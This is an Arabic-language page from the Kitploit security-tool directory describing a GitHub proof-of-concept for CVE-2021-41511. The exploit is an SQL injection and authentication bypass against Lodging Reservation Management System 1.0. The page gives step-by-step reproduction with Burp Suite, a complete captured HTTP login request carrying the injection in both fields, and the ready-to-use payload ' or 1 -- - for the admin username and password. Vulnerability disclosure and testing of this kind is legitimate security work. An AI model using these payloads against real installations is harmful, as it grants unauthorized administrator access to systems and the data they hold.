Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/vidvansh/cve-2021-41511
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubvidvansh/cve-2021-41511

CVE-2021-41511

استغلال إثبات المفهوم لحقن SQL وتجاوز المصادقة في نظام إدارة حجوزات الإقامة 1.0، مما يتيح وصولاً غير مصرح به للمسؤول عبر حمولات مصممة.

عرض المستودع
9منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-41511

عنوان الثغرة: Lodging Reservation Management System 1.0 - حقن SQL / تجاوز المصادقة

مؤلف الأداة: Nitin Sharma(vidvansh)

الصفحة الرئيسية للمورد: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html

رابط البرنامج: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code

الإصدار: v1.0

تم اختباره على: Windows 10 - XAMPP Server

الوصف: حقل إدخال كلمة المرور معرّض لتجاوز المصادقة بسبب عدم تنقية المدخلات بشكل صحيح، مما يؤدي إلى الوصول إلى حسابات غير مصرح بها.

#خطوات إعادة الإنتاج: خطوة 1 انتقل إلى لوحة إدارة المنتج http://localhost/lodge/admin/login.php. خطوة 2 – أدخل أي شيء في اسم المستخدم وكلمة المرور خطوة 3 – انقر على Login والتقط الطلب في Burp Suite. خطوة 4 – غيّر اسم المستخدم إلى ' OR 1 -- - وكلمة المرور إلى ' OR 1 -- -. خطوة 5 – انقر على Forward وستتم الآن تسجيل الدخول كمسؤول.

PoC:

POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin

username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+

تجاوز المصادقة:

اذهب إلى صفحة تسجيل دخول المسؤول (http://localhost/lodge/admin/login.php)، ثم استخدم الحمولة التالية كاسم مستخدم وكلمة مرور =>

اسم المستخدم: ' or 1 -- - كلمة المرور: ' or 1 -- -

تنزيل الأداة